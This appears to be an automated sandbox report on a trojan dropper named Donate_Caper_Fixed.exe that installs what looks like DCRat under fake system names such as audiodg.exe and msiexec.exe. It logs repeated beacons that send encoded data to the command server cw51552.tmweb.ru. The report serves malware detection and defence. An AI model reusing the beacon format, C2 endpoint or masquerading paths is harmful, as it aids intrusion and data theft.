Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru

Source: unknown

DNS traffic detected: queries for: cw51552.tmweb.ru

Source: Donate_Caper_Fixed.exe, 00000000.00000003.643569193.000000000497A000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: Donate_Caper_Fixed.exe, 00000000.00000003.643569193.000000000497A000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: audiodg.exe, 00000012.00000003.889591171.000001D42D803000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: audiodg.exe, 00000012.00000003.889591171.000001D42D803000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Donate_Caper_Fixed.exe, 00000000.00000003.643569193.000000000497A000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Donate_Caper_Fixed.exe, 00000000.00000003.643569193.000000000497A000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: Donate_Caper_Fixed.exe, 00000000.00000003.643569193.000000000497A000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Donate_Caper_Fixed.exe, 00000000.00000003.643569193.000000000497A000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: audiodg.exe, 00000012.00000003.889591171.000001D42D803000.00000004.00000001.sdmp	String found in binary or memory: http://crls.pki.goog/gts1d2/mf1x6KtY0O4.crl0
Source: sessionhostmonitorSavesruntimeNet.exe, 0000000A.00000002.699583669.000002C3803A4000.00000004.00000001.sdmp, audiodg.exe, 00000012.00000002.910137751.000001D414FF9000.00000004.00000001.sdmp, msiexec.exe, 00000015.00000002.727170502.000001B22A657000.00000004.00000001.sdmp, conhost.exe, 0000001C.00000002.735365466.000002710009A000.00000004.00000001.sdmp, conhost.exe, 0000001D.00000002.715249289.000002270999D000.00000004.00000001.sdmp, dwm.exe, 0000001E.00000002.740337767.00000238499F1000.00000004.00000001.sdmp, audiodg.exe, 00000021.00000002.729435811.0000026F023CA000.00000004.00000001.sdmp, msiexec.exe, 00000023.00000002.750816510.00000176CC131000.00000004.00000001.sdmp	String found in binary or memory: http://cw51552.t0y;
Source: audiodg.exe, 00000012.00000002.909612258.000001D414E61000.00000004.00000001.sdmp	String found in binary or memory: http://cw51552.tmweb.ru
Source: msiexec.exe, 00000023.00000002.750816510.00000176CC131000.00000004.00000001.sdmp	String found in binary or memory: http://cw51552.tmweb.ru/
Source: audiodg.exe, 00000012.00000002.910278842.000001D415052000.00000004.00000001.sdmp, audiodg.exe, 00000012.00000002.912758776.000001D41552F000.00000004.00000001.sdmp	String found in binary or memory: http://cw51552.tmweb.ru/pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3
Source: audiodg.exe, 00000012.00000002.911120912.000001D4152E4000.00000004.00000001.sdmp	String found in binary or memory: http://cw51552.tmweb.ru8
Source: audiodg.exe, 00000012.00000002.910055023.000001D414FD5000.00000004.00000001.sdmp	String found in binary or memory: http://ipinfo.io
Source: Donate_Caper_Fixed.exe, 00000000.00000003.643569193.000000000497A000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: Donate_Caper_Fixed.exe, 00000000.00000003.643569193.000000000497A000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: audiodg.exe, 00000012.00000003.889591171.000001D42D803000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: audiodg.exe, 00000012.00000003.889591171.000001D42D803000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1d20
Source: audiodg.exe, 00000012.00000003.889591171.000001D42D803000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1D2.crt0
Source: sessionhostmonitorSavesruntimeNet.exe, 0000000A.00000002.699088744.000002C38010C000.00000004.00000001.sdmp, audiodg.exe, 00000012.00000002.909612258.000001D414E61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Donate_Caper_Fixed.exe, 00000000.00000003.643569193.000000000497A000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: sessionhostmonitorSavesruntimeNet.exe, 0000000A.00000002.698876300.000002C380001000.00000004.00000001.sdmp, audiodg.exe, 00000012.00000002.909690528.000001D414EDB000.00000004.00000001.sdmp, audiodg.exe, 00000012.00000002.909612258.000001D414E61000.00000004.00000001.sdmp, msiexec.exe, 00000015.00000002.725689848.000001B22A5C1000.00000004.00000001.sdmp, conhost.exe, 0000001C.00000002.734284162.0000027100001000.00000004.00000001.sdmp, conhost.exe, 0000001D.00000002.714934472.0000022709901000.00000004.00000001.sdmp, dwm.exe, 0000001E.00000002.739273160.0000023849951000.00000004.00000001.sdmp, audiodg.exe, 00000021.00000002.729298028.0000026F02331000.00000004.00000001.sdmp, msiexec.exe, 00000023.00000002.750274756.00000176CC091000.00000004.00000001.sdmp	String found in binary or memory: https://ipinfo.io/json
Source: audiodg.exe, 00000012.00000002.910137751.000001D414FF9000.00000004.00000001.sdmp	String found in binary or memory: https://ipinfo.io/mi
Source: audiodg.exe, 00000012.00000002.909732687.000001D414F06000.00000004.00000001.sdmp, audiodg.exe, 00000012.00000002.909744301.000001D414F0A000.00000004.00000001.sdmp	String found in binary or memory: https://ipinfo.io/missingauth
Source: audiodg.exe, 00000012.00000002.910137751.000001D414FF9000.00000004.00000001.sdmp	String found in binary or memory: https://ipinfo.io/missingauthX
Source: audiodg.exe, 00000012.00000002.909690528.000001D414EDB000.00000004.00000001.sdmp	String found in binary or memory: https://ipinfo.iox
Source: audiodg.exe, 00000012.00000003.889591171.000001D42D803000.00000004.00000001.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: Donate_Caper_Fixed.exe, 00000000.00000003.643185472.0000000004640000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr	String found in binary or memory: https://redirect.kaspersky.com/partnersite/a151e0a4-378b-45d0-ba3a-8fb23f39ca2d/slideshow?act-local=
Source: msiexec.exe, 00000023.00000002.750274756.00000176CC091000.00000004.00000001.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/
Source: Donate_Caper_Fixed.exe, 00000000.00000003.643569193.000000000497A000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443

Source: unknown

HTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.4:49743 version: TLS 1.2

System Summary:

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

Code function: 0_2_004066FE: __EH_prolog,CreateFileW,CloseHandle,_wcslen,CreateDirectoryW,_wcscpy,_wcslen,_wcscpy,_wcscpy,_wcscpy,_wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_004066FE

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe

File created: C:\Windows\AppReadiness\audiodg.exe

Jump to behavior

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00417894	0_2_00417894
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00401CA9	0_2_00401CA9
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00414050	0_2_00414050
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00427814	0_2_00427814
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_004158D3	0_2_004158D3
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0041416C	0_2_0041416C
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00404926	0_2_00404926
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0041A9C9	0_2_0041A9C9
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0040C19C	0_2_0040C19C
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0041B1A9	0_2_0041B1A9
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00413A24	0_2_00413A24
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_004272D0	0_2_004272D0
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_004102E7	0_2_004102E7
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0040C3F3	0_2_0040C3F3
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0041A4F4	0_2_0041A4F4
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00414487	0_2_00414487
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00428D51	0_2_00428D51
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0040FD6B	0_2_0040FD6B
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0041B5C9	0_2_0041B5C9
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00426D8C	0_2_00426D8C
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00405595	0_2_00405595
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0041AD9D	0_2_0041AD9D
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00402ECC	0_2_00402ECC
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0041EED4	0_2_0041EED4
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00416767	0_2_00416767
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00427F0C	0_2_00427F0C
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0040C7C0	0_2_0040C7C0
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0016857B	4_2_0016857B
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0018D00E	4_2_0018D00E
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0016407E	4_2_0016407E
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_001770BF	4_2_001770BF
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_00191194	4_2_00191194
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_00163281	4_2_00163281
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0016E2A0	4_2_0016E2A0
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_001802F6	4_2_001802F6
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_00176646	4_2_00176646
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0018070E	4_2_0018070E
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0018473A	4_2_0018473A
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_001737C1	4_2_001737C1
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_001627E8	4_2_001627E8
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0016E8A0	4_2_0016E8A0
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_00184969	4_2_00184969
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0016F968	4_2_0016F968
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_00173A3C	4_2_00173A3C
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_00176A7B	4_2_00176A7B
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_00180B43	4_2_00180B43
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0018CB60	4_2_0018CB60
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_00175C77	4_2_00175C77
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0016ED14	4_2_0016ED14
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_00173D6D	4_2_00173D6D
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0017FDFA	4_2_0017FDFA
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0016BE13	4_2_0016BE13
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0016DE6C	4_2_0016DE6C
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_00165F3C	4_2_00165F3C
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_00180F78	4_2_00180F78
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Code function: 10_2_00007FFA35C5EDC6	10_2_00007FFA35C5EDC6
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Code function: 10_2_00007FFA35C5FB72	10_2_00007FFA35C5FB72
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Code function: 10_2_00007FFA35C5AEAA	10_2_00007FFA35C5AEAA
Source: C:\Windows\AppReadiness\audiodg.exe	Code function: 18_2_00007FFA35C5EDC6	18_2_00007FFA35C5EDC6
Source: C:\Windows\AppReadiness\audiodg.exe	Code function: 18_2_00007FFA35C5FB72	18_2_00007FFA35C5FB72
Source: C:\Windows\AppReadiness\audiodg.exe	Code function: 18_2_00007FFA35C5AEAA	18_2_00007FFA35C5AEAA
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Code function: 21_2_00007FFA35C4EDC6	21_2_00007FFA35C4EDC6
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Code function: 21_2_00007FFA35C4FB72	21_2_00007FFA35C4FB72
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Code function: 21_2_00007FFA35C4ACD0	21_2_00007FFA35C4ACD0
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Code function: 29_2_00007FFA35C4ACD0	29_2_00007FFA35C4ACD0
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Code function: 29_2_00007FFA35C40B8C	29_2_00007FFA35C40B8C
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Code function: 30_2_00007FFA35C5EDC6	30_2_00007FFA35C5EDC6
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Code function: 30_2_00007FFA35C5FB72	30_2_00007FFA35C5FB72
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Code function: 30_2_00007FFA35C5AEAA	30_2_00007FFA35C5AEAA
Source: C:\Windows\AppReadiness\audiodg.exe	Code function: 33_2_00007FFA35C30B8C	33_2_00007FFA35C30B8C
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Code function: 35_2_00007FFA35C5AEAA	35_2_00007FFA35C5AEAA
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Code function: 35_2_00007FFA35C50B8C	35_2_00007FFA35C50B8C

Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: String function: 0017ED00 appears 31 times
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: String function: 0017E28C appears 35 times
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: String function: 0017E360 appears 52 times
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: String function: 00419DD4 appears 39 times
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: String function: 0041F49C appears 38 times
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: String function: 0041A3E0 appears 45 times

Source: ks4.021.3.10.391ru_25000.exe.0.dr	Static PE information: Resource name: SZIP type: 7-zip archive data, version 0.3
Source: ks4.021.3.10.391ru_25000.exe.0.dr	Static PE information: Resource name: SZIP type: 7-zip archive data, version 0.4
Source: ks4.021.3.10.391ru_25000.exe.0.dr	Static PE information: Resource name: SZIP type: 7-zip archive data, version 0.4

Source: Donate_Caper_Fixed.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Donate_Caper_Fixed.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DCRatBuild.sfx.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DCRatBuild.sfx.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ks4.021.3.10.391ru_25000.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Donate_Caper2021.sfx.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Donate_Caper2021.sfx.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Donate_Caper2021.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Donate_Caper2021.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Donate_Caper_Fixed.exe, 00000000.00000002.648345213.00000000026B0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs Donate_Caper_Fixed.exe
Source: Donate_Caper_Fixed.exe, 00000000.00000002.648345213.00000000026B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Donate_Caper_Fixed.exe
Source: Donate_Caper_Fixed.exe, 00000000.00000003.643569193.000000000497A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSetup.exeD vs Donate_Caper_Fixed.exe
